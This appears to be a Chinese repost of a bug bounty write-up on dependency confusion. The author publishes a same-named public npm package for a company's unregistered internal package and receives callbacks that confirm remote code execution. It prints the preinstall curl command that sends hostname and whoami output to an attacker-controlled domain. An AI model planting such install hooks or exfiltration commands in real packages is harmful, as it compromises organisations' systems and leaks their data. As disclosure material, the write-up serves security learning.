当前位置: 首页 > news >正文

【网络安全】依赖混淆漏洞实现RCE

未经许可,不得转载。

文章目录

    • 正文

依赖混淆是一种供应链攻击漏洞,发生在企业的内部依赖包错误地从公共库(如npm)下载,而不是从其私有注册表下载。攻击者可以在公共注册表中上传一个与公司内部包同名的恶意包,一旦企业系统从公共源解析并下载该包,恶意代码便可能被执行,进而带来安全风险,如远程代码执行(RCE)。

正文

我发现某企业的前端 JavaScript 文件引用了一个存储在/node_modules/@confidential-package-name的Node.js包。进一步查询后,我发现这个内部包尚未在npm公共注册表中注册。

我创建了一个与内部包同名的恶意npm包,并将其发布到公共npm注册表中。在该包的preinstall脚本中,我嵌入了一个简单的命令,用来在安装时自动执行:

curl — data-urlencode “info=$(hostname && whoami)” http://<attacker-controlled-domain>.oast.fun

这个脚本会将服务器的主机名和用户名发送到我控制的域。

img

包上线后,数小时至几天内就收到了来自该公司的生产环境和非生产环境的多个请求,这说明他们的系统正在下载并执行这个恶意包。

img

在收到超过150个HTTP和DNS查询后,我分析IP地址,排除了已知的爬虫流量,并通过WHOIS查询检哪些请求能够匹配企业IP或其服务提供商的IP。可以看到,我实现了RCE:

img

img

原文出处:https://medium.com/@p0lyxena/2-500-bug-bounty-write-up-remote-code-execution-rce-via-unclaimed-node-package-6b9108d10643

http://www.lryc.cn/news/444275.html

相关文章:

  • FC优化配置
  • 文件防泄漏方法有哪些|6个方法有效防止文件泄密
  • 云盘还安全么?阿里云盘出现BUG,惊现大量陌生人照片
  • 蘑菇成熟待收检测系统源码分享
  • 基于单片机的智能小车的开发与设计
  • 解决 GitLab CI/CD 中的 `413 Request Entity Too Large` 错误
  • Java项目实战II基于Java+Spring Boot+MySQL的洗衣店订单管理系统(开发文档+源码+数据库)
  • Can‘t connect to local MySQL server through socket
  • 【车载以太网】【SOME/IP】Wireshark 解析
  • Perl 进程管理
  • 爬虫 ----hook
  • 【监控】【Nginx】使用 Docker 部署 Prometheus + Grafana 监控 Nginx
  • Vue3 + Vite Web项目 Electron 打包桌面应用程序
  • Linux:login shell和non-login shell以及其配置文件
  • 面试速通宝典——1
  • 用uniapp 及socket.io做一个简单聊天 升级 9
  • 【Unity Shader】Special Effects(九)Vortex 旋涡(UI)
  • 01_两数之和
  • ChatGLM-6B-部署与使用
  • 李宏毅结构化学习 03
  • java重点学习-总结
  • 文件操作
  • docker存储
  • Ubuntu20.04.6 环境下docker设置proxy
  • 如何给文件夹里面的文件批量添加前缀和编号(利用C#写的小工具)
  • 使用分布式调度框架时需要考虑的问题——详解
  • C语言编译四大阶段
  • C# 关于“您与该网站的连接不是私密连接...”的问题
  • 【超详细】基于YOLOv8训练无人机视角Visdrone2019数据集
  • VUE项目在Linux子系统部署